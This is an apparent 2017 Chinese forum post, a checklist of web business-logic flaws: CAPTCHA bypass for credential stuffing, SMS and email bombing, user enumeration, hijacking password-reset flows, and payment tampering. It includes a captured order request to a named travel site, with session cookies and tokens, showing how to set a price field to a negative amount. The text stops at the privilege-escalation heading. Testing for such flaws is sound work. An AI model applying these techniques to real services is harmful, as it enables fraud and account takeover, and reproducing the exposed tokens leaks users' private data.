本帖最后由 tom0li 于 2017-8-14 22:30 编辑
逻辑漏洞小结
0x00 常见点
个人信息
密码修改
密码忘记
支付区域
手机号
地址
0x01 登陆处(不局限登陆,例如下文的短信轰炸等)
登陆时,是否可以绕过验证码形成撞库
返回包中有验证码
返回页面 hidden中有验证码
有些其他登陆url中不需要验证码
验证码不变,验证码没有一个完整的服务请求,只在刷新url时才变
第一次请求包验证了验证码是否正确,第二次请求不需要验证
拦截登录时验证码的刷新请求,第一次验证码未失效,可绕过
验证码和用户名、密码是否一次同时提交
公众号,app无验证
简单验证码ocr识别
交给三方打码平台
邮箱轰炸,短信轰炸,burp Repeate,短信轰炸验证码有60秒限制时,有的参数修改后可绕过
isVerfi参数 这里是1 回包 3 手机没收到信息 存在验证码限制
改为0 回显2 绕过了验证码限制
枚举注册用户 输入用户名,发送请求验证用户名是否正确
cookie简单可猜测
cookie一直有效,(修改密码后)
0x02 密码找回
验证码回传
验证码时间长,不失效可爆破(字典可去除全1重复数多的)
修改密码,修改发送手机号修改为自己可控,
邮箱验证可猜测
假如找回需要4部,最后一部有user参数,用自己账号正常到第三部,第四部修改user实现
两个手机号
第一个手机
正常 忘记密码 到第三步
在同一浏览器下
第二手机号
忘记密码 提交到第二部
刷新 第一个手机的第三部时可 发现 用户名变为第二个手机
邮箱同上
删除验证码校验,绕过
各种参数fuzz
0x03 支付
金额运费修改
```
POST /iflight/submitorder.html HTTP/1.1
Host: wx.17u.cn
Accept: application/json
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Origin: <a href="http://wx.17u.cn" target="_blank">http://wx.17u.cn</a>
Content-Length: 780
Connetion: keep-alive
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_1 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B436 MicroMessenger/6.3.13 NetType/3G+ Language/zh_CN
Referer: <a href="http://wx.17u.cn/iflight/book2.html?showwxpaytitle=1&guid=0e1d1663-803f-4f0d-962c-6efdd953bfb0&pname=%E4%BC%98%E9%80%89%E7%BB%8F%E6%B5%8E%E8%88%B1&openId=oOCyauK2742VyO4lLB7MR9KyZ21o" target="_blank">http://wx.17u.cn/iflight/book2.h ... 42VyO4lLB7MR9KyZ21o</a>
Cookie: Hm_lpvt_ce483b7c47bdfff963bf969de6b20019=1455694949; Hm_lpvt_f124dc8d3ca8e5fe66210d2c8c4c9c73=1455694949; Hm_lvt_ce483b7c47bdfff963bf969de6b20019=1455693089; Hm_lvt_dac6eb9775cdf535d3f23bd7df437024=1455530510; Hm_lvt_f124dc8d3ca8e5fe66210d2c8c4c9c73=1455693079; ASP.NET_SessionId=ynx5tnjn35tycx4ed1njfv51; RedEnvelope=mobile=*&proid=1&sign=e657fb8e47cb54685a9dc8ba1c2ef71a; route=04c7e27d7ac260044207170d0d0c2dcc; __tctma=217272534.1455530050464768.1455530050361.1455530050361.1455692231159.2; __tctmb=217272534.2336832102596608.1455694516121.1455694520499.39; __tctmc=217272534.255680334; __tctmd=217272534.49516128; __tctmu=217272534.0.0; __tctmz=217272534.1455692231159.2.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __tctrack=0; cookieOpenSource=openid=oOCyauK2742VyO4lLB7MR9KyZ21o&token=OezXcEiiBSKSxW0eoylIeGWrGa1k0ZhUFKJ2Kjd4-zx3QnTOZ8dZFNps3K1OWCRUlPHVgWxoAKNpZkdnWqlPK4-rFsO78vhV_f3g5ssJfbvO-sxvyvNd1ejJdQzrafo37eJPpoRbmC4oEv-F13n28g; CooperateUser=CooperateUserId=oOCyauK2742VyO4lLB7MR9KyZ21o&openid=oOCyauK2742VyO4lLB7MR9KyZ21o&MemberId=KJ1N9y9uWzKeAIYNlnf7IQ%3d%3d; CooperateWxUser=CooperateUserId=oOCyauK2742VyO4lLB7MR9KyZ21o&openid=oOCyauK2742VyO4lLB7MR9KyZ21o&MemberId=KJ1N9y9uWzKeAIYNlnf7IQ%3d%3d&token=OezXcEiiBSKSxW0eoylIeGWrGa1k0ZhUFKJ2Kjd4-zx3QnTOZ8dZFNps3K1OWCRU457vrjrGm572APrLXimER80jQ-aUtGsJG2gofngMvkfOIsX5HHbL8R8vXcvyBn3l6c2rjQeO9pAbvQqg3UYPVA&MemberSysId=33; longKey=1455530050464768; selectIFlightTip=true; WxUser=openid=oOCyauK2742VyO4lLB7MR9KyZ21o&token=OezXcEiiBSKSxW0eoylIeGWrGa1k0ZhUFKJ2Kjd4-zx3QnTOZ8dZFNps3K1OWCRU457vrjrGm572APrLXimER80jQ-aUtGsJG2gofngMvkfOIsX5HHbL8R8vXcvyBn3l6c2rjQeO9pAbvQqg3UYPVA&refreshtoken=OezXcEiiBSKSxW0eoylIeGWrGa1k0ZhUFKJ2Kjd4-zx3QnTOZ8dZFNps3K1OWCRUPl81zJaYBlhJ559aXBeMJxcXQjdSymG3BlcYQapjwxGizgjMMomJlQRrag5UzFSLvQeUmKHWQMxUUkKgTLhGww&userid=KJ1N9y9uWzKeAIYNlnf7IQ==
req=%7B%22sg%22%3A%220e1d1663-803f-4f0d-962c-6efdd953bfb0%22%2C%22opass%22%3A%5B%7B%22ln%22%3A%22CE%22%2C%22fn%22%3A%22SHI%22%2C%22sex%22%3A1%2C%22nat%22%3A%22%E4%B8%AD%E5%9B%BD%22%2C%22bir%22%3A%221989-01-01%22%2C%22ctype%22%3A%221%22%2C%22no%22%3A%2215262727%22%2C%22pt%22%3A%221%22%2C%22lid%22%3A%2297789585%22%2C%22bx%22%3A%5B%7B%22bxtype%22%3A391%2C%22bxprice%22%3A80%2C%22bxcutprofit%22%3A0%2C%22reentryAmount%22%3A65%2C%22bxqz%22%3Afalse%7D%2C%7B%22bxtype%22%3A331%2C%22bxprice%22%3A20%7D%5D%7D%5D%2C%22contact%22%3A%7B%22mo%22%3A%2213111111111%22%2C%22email%22%3A%22%22%7D%2C%22mtype%22%3A0%2C%22account%22%3A%22%22%2C%22memid%22%3A139978118%2C%22Plat%22%3A10%2C%22pubplat%22%3A501%2C%22inf%22%3A0%2C%22cnn%22%3A0%2C%22adt%22%3A1%2C%22total%22%3A1462%7D&moblie=13111111111
```
修改bxprice,可改成任意负数金额
实例 https://threathunter.org/topic/593ff6bc9c58e020408a79d4
0x04 越权
|